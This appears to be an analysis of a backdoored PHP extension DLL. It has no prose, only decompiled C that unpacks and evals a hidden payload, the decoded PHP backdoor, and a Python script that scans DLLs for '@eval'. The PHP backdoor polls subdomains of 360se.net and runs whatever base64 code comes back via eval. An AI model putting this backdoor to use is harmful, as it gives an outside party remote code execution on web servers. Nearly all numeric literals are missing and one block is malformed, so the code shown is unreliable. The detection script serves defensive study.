while (  )

    {

      if ( *(_DWORD *)v13 ==  )

      {

        v10[v12] = ;

        v43[v12 + ] = *v11;

        v12 += ;

        v13 += ;

      }

      else

      {

        v10[v12++] = *v11;

        v13 += ;

      }

      v11 += ;

      if ( (signed int)v11 >= (signed int)asc_1000C66C )

        break;

      v10 = v43;

    }

    spprintf(&v43, , a_evalSS, aGzuncompress, v43);

    v24 = *(_DWORD *)(*a3 +  * executor_globals_id - );

    v25 = *(_DWORD *)(v24 + );

    *(_DWORD *)(v24 + ) = &v33;

    v40 = v25;

    v26 = setjmp3(&v33, );

    v27 = v40;

    if ( v26 )

    {

      v28 = a3;

      *(_DWORD *)(*(_DWORD *)(*a3 +  * executor_globals_id - ) + ) = v40;

    }

    else

    {

    }

    else

    {

      v28 = a3;

      zend_eval_string(v43, , &byte_10011B34, a3);

    }

    *(_DWORD *)(*(_DWORD *)(*v28 +  * executor_globals_id - ) + ) = v27;

    if ( dword_1000C010 <  )

      dword_1000C010 += ;

    ftime(&dword_10011D50);

  }

@ini_set("display_errors","");

error_reporting();

$h = $_SERVER['HTTP_HOST'];

$p = $_SERVER['SERVER_PORT'];

$fp = fsockopen($h, $p, $errno, $errstr, );

if (!$fp) {

} else {

    $out = "GET {$_SERVER['SCRIPT_NAME']} HTTP/1.1\r\n";

    $out .= "Host: {$h}\r\n";

    $out .= "Accept-Encoding: compress,gzip\r\n";

    $out .= "Connection: Close\r\n\r\n";

    fwrite($fp, $out);

    fclose($fp);

}

@ini_set("display_errors","");

error_reporting();

function tcpGet($sendMsg = '', $ip = '360se.net', $port = ''){

    $result = "";

  $handle = stream_socket_client("tcp://{$ip}:{$port}", $errno, $errstr,);

  if( !$handle ){

    $handle = fsockopen($ip, intval($port), $errno, $errstr, );

    if( !$handle ){

        return "err";

    }

  }

  fwrite($handle, $sendMsg."\n");

    while(!feof($handle)){

        stream_set_timeout($handle, );

        $result .= fread($handle, );

        $info = stream_get_meta_data($handle);

        if ($info['timed_out']) {

          break;

        }

     }

  fclose($handle);

  return $result;

}

$ds = array("www","bbs","cms","down","up","file","ftp");

$ps = array("","","","","");

$n = false;

do {

    $n = false;

    foreach ($ds as $d){

        $b = false;

        foreach ($ps as $p){

            $result = tcpGet($i,$d.".360se.net",$p);

            if ($result != "err"){

                $b =true;

                break;

            }

        }

        if ($b)break;

    }

    $info = explode("<^>",$result);

    if (count($info)==){

        if (strpos($info[],"/*Onemore*/") !== false){

            $info[] = str_replace("/*Onemore*/","",$info[]);

            $n=true;

        }

        @eval(base64_decode($info[]));

    }

}while($n);

# -*- coding:utf8 -*-

__author__='pcat@chamd5.org'

__blog__='http://pcat.cc'

import os

import string

import re

def strings(file) :

    chars = string.printable[:94]

    shortestReturnChar = 4

    regExp = '[%s]{%d,}' % (chars, shortestReturnChar)

    pattern = re.compile(regExp)

    with open(file, 'rb') as f:

        return pattern.findall(f.read())

def grep(lines,pattern):

    for line in lines:

        if pattern in line:

            yield line

def pcheck(filename):

    # * feature

    *='@eval'

    # just check dll file

    if filename.endswith('.dll'):

        lines=strings(filename)

        try:

            grep(lines,*).next()

        except:

            return

        print '=== {0} ==='.format(filename)

        for line in grep(lines,*):

            print line

    pass

def foo():

    # . stand for current directory

    for path, dirs, files in os.walk(".", topdown=False):

        for name in files:

            pcheck(os.path.join(path, name))

        for name in dirs:

            pcheck(os.path.join(path, name))

    pass

if __name__ == '__main__':

    foo()